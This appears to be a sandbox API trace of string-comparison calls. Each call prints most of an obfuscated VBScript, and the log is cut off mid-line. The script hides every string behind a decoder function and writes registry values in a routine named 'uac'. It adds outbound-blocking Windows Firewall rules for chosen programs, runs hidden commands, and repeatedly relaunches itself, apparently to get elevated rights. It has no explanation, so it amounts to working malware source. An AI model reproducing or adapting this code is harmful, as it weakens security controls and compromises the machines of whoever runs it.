bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0222.981] wcsncmp (_String1="0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 35 [0222.981] wcsncmp (_String1="\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 28 [0222.981] wcsncmp (_String1="\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0222.981] wcsncmp (_String1="Const PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run 